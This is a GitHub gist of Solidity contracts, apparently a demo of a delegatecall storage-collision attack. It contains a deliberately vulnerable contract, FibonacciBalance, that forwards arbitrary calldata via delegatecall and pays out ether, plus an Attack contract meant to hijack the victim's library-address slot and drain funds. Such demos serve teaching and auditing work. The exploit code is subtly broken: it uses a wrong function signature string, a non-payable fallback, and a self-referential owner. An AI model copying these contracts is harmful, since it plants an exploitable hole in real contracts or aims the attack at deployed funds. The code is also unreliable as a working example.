Created
August 2, 2022 11:38
-
-
Save weev3/58d876a95d93ffc3c730ef7c071aa086 to your computer and use it in GitHub Desktop.
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.8.12+commit.f00d7308.js&optimize=false&runs=200&gist=
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity <=0.8.13; | |
| contract FibonacciLib { | |
| uint public start; | |
| uint public calculatedFibNumber; | |
| function setStart(uint _start) public { | |
| start = _start; | |
| } | |
| function setFibonacci(uint n) public { | |
| calculatedFibNumber = fibonacci(n); | |
| } | |
| function fibonacci(uint n) internal returns (uint) { | |
| if (n == 0) return start; | |
| else if (n == 1) return start + 1; | |
| else return fibonacci(n - 1) + fibonacci(n - 2); | |
| } | |
| } | |
| contract FibonacciBalance { | |
| address public fibonacciLibrary; | |
| uint public calculatedFibNumber; | |
| uint public start = 3; | |
| uint public withdrawalCounter; | |
| constructor(address _fibonacciLibrary) public payable { | |
| fibonacciLibrary = _fibonacciLibrary; | |
| } | |
| function withdraw() public{ | |
| withdrawalCounter += 1; | |
| (bool success,)=fibonacciLibrary.delegatecall(abi.encodeWithSignature("setFibonacci(uint256)", withdrawalCounter)); | |
| payable(msg.sender).transfer(calculatedFibNumber * 1 ether); | |
| } | |
| function getBalance() public view returns(uint256){ | |
| return address(this).balance; | |
| } | |
| fallback() external { | |
| (bool success,) = fibonacciLibrary.delegatecall(msg.data); | |
| } | |
| } | |
| contract Attack{ | |
| address public fibonacciLibrary; | |
| uint public calculatedFibNumber; | |
| address public FibonacciBalance; | |
| address owner; | |
| constructor(address _hackMe) { | |
| FibonacciBalance = _hackMe; | |
| owner = address(this); | |
| } | |
| function attack() public { | |
| FibonacciBalance.call(abi.encodeWithSignature("setStart(uint)", uint(uint160(address(this))))); | |
| } | |
| fallback() external{ | |
| payable(owner).transfer(address(this).balance); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment